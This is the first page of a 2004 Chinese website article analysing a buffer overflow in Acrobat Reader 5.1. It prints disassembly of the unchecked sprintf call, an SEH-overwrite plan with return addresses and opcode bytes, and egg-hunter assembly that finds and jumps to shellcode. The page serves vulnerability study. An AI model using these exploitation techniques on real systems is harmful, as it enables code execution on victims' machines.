文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术Acrobat Reader5.1漏洞分析
精品推荐
特别推荐
·新手轻轻松松做网管必须掌握的步骤
·ADSL路由方式的NAT(端口映射)
·保护系统 彻底清除Infostealer.Gampass病毒
·网管高招另类方法解决离奇断网故障二例
·Windows2000 下管理员账户真的不安全
·Windows下权限设置详解
·网络排障实战:路由器和交换机为何不通?
·安装网卡驱动常见故障及解决方法
·多种方法让网络共享资源自动映射
·Delphi中的流技术- 详细篇
·秘籍宝典:Ping命令的使用
·教你伪装MAC地址
·掌握超五类 双绞线的 原理与制作方法
·让你的ADSL不再自动掉线
·快速增强路由器安全的十个小技巧
·高手教你实测无线路由器的安全功能
·无线上网搭配方案
·UNIX 常用的指令/终结完整编
·解决南北网络问题 千渡南北互通
·ADSL上网的常见问题及分析集锦
热点TOP10
·惊恐:知道对方IP就能入侵别人的电脑
·窥视计算机病毒的磁盘存储结构
·保护系统 彻底清除Infostealer.Gampass病毒
·Windows 安全诊所:清除间谍软件下篇
·光辉回忆录:黑客创下的“重大战绩”
·ADSL Modem防攻击“修炼秘技”
·数千黑客狂攻世界杯 上演网络狙击战
·真的无罪吗?窥视Serv-U密码破解
·从入门到精通 网吧免费上网狙击战
·网络江湖传奇:认识中国的黑客精英
·批量查询域名工具Domain Inspect 1.5 汉化注册版
·汉化软件教程
·世界上最好的磁盘碎片整理工具原版+汉化+注册机
·SQL Navigator
·ADSL宽带网络的配制及优化技巧
·配置 VMware通过令牌访问LAN
·狂拽~用别人的服务器做硬盘!
·无图像、无声音、图像声音不同步问题的解决办法
·[常用]更快的文件打包 Ultraiso 软件教学
·驯服你的Windows Firewall

Acrobat Reader5.1漏洞分析
日期:2004年10月26日 作者:清风网络学院 查看:[大字体 中字体 小字体]

只对Acrobat Reader 5.1有效
在一个xdf文件里放入一个超长的<xfdf xmlns>段,会造成溢出

问题代码
001B:2200E249 55 PUSH EBP
001B:2200E24A 8BEC MOV EBP,ESP
001B:2200E24C 81EC40010000 SUB ESP,00000140 //分配0x140长度
001B:2200E252 53 PUSH EBX
001B:2200E253 56 PUSH ESI
001B:2200E254 57 PUSH EDI
001B:2200E255 6A01 PUSH 01
001B:2200E257 6A05 PUSH 05
001B:2200E259 33DB XOR EBX,EBX
001B:2200E25B FF7508 PUSH DWORD PTR [EBP+08]
001B:2200E25E 8D4DFC LEA ECX,[EBP-04]
001B:2200E261 895DFC MOV [EBP-04],EBX
001B:2200E264 E839470500 CALL 220629A2
001B:2200E269 A1542D0A22 MOV EAX,[220A2D54]
001B:2200E26E 53 PUSH EBX
001B:2200E26F FF75FC PUSH DWORD PTR [EBP-04]
001B:2200E272 FF5064 CALL [EAX+64]
001B:2200E275 59 POP ECX
001B:2200E276 59 POP ECX
001B:2200E277 50 PUSH EAX
001B:2200E278 8D85C0FEFFFF LEA EAX,[EBP-0140]
001B:2200E27E 682C4D0922 PUSH 22094D2C
001B:2200E283 50 PUSH EAX
001B:2200E284 FF1564F20822 CALL [MSVCRT!sprintf] //不安全调用sprintf造成溢出
001B:2200E28A 83C40C ADD ESP,0C
001B:2200E28D 8D85C0FEFFFF LEA EAX,[EBP-0140]
001B:2200E293 50 PUSH EAX
001B:2200E294 FF15FCF00822 CALL [KERNEL32!OutputDebugStringA]
001B:2200E29A FF75FC PUSH DWORD PTR [EBP-04]
001B:2200E29D 8B7510 MOV ESI,[EBP+10]
001B:2200E2A0 56 PUSH ESI
001B:2200E2A1 E8D7110000 CALL 2200F47D //call里面会产生异常

分配缓冲区为0X140大小,spfintf时没有做长度检查,导致溢出。可以覆盖ret和异常处理函数
最近的ret在2200e697,相差上千字节,太远,不考虑

于是覆盖异常处理地址,异常处理函数链表
12ed30
12ef3c
12f0e0
12f598
12ff04
12ffb0
12ffe0

覆盖第一个函数12ed30,改为pop esi,pop eax,ret(5e 5f c3)的地址774a295a,之前的4个字节改为
push ecx 51
pop ecx 59
pop eax 58 //这里正好把context的头指针给了eax,后面会用到
push 774a295a 68 //这里正好把返回地址774a295a跳过,运行后面的指令
跳过774a295a之后,是shellcode
经过几次JAE跳转,跳到不限制可见字符的地方,只有160个字节左右可用,用这段字节来搜索内存,标志为LLEE,找到真正的shellcode(放在xdf文件后面)

搜索内存代码1
jmp excep1

excep2:
mov ecx,fs:[0] //接管异常
push ecx
mov fs:[0],esp
mov edx,0x45454c4d //LLEE
dec edx
mov eax,esi

next:
inc eax //搜索内存
cmp [eax],edx
jz find
jmp next

find:
add eax,4 //找到,跳转
jmp eax

excep1:
call excep2

mov edx,[esp+0xc]
xor ebx,ebx
mov bl,1
shl ebx,0x0c
add [edx+0xb0],ebx
xor eax,eax
ret

经实验发现这种搜索内存的方法在XP下不起左右,因为XP的异常处理比2K多了一个检测,
001B:77F978D1 8B4304 MOV EAX,[EBX+04] //EAX为异常结构链的第一个函数的地址,即上面的excep1
001B:77F978D4 3B45FC CMP EAX,[EBP-04]

[1] [2] 下一页 




上一篇:windows溢出随笔

下一篇:Windows lsasrv.dll远程溢出分析

Acrobat Reader5.1漏洞分析 相关文章:
·Windows系统漏洞修复软件大比拼
·配置Catalyst交换端口分析器(SPAN)
·一次入侵过程的公开分析
·万能五笔2001注册码分析及暴力破解 上
·BT下载速度变慢原因解读及应对方法分析
·Flash漏洞最新疫情:一周感染190万用户
·电脑死机的故障分析
·ORACLE常见错误代码的分析与解决之二
·统计分析Web服务器日志
·利用腾讯漏洞取回QQ密码
Acrobat Reader5.1漏洞分析 相关软件:
·Adobe Acrobat ReaderV8.1.2 简体中文版
·3D 动画与建模:人体的综合与分析技术
·Adobe Acrobat7.0 Pro
·文字编辑 TextForever(FineReader) V1.55
·建设部监理师-案例分析录音16
·频谱分析仪V1.10
·超星图书浏览器(SSReader)V4.0 (20070428) 标准版
·属相分析大师 V1.0
·Acrobat Key V7.5.1963 汉化版
·金融炼金术:证券分析的逻辑

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot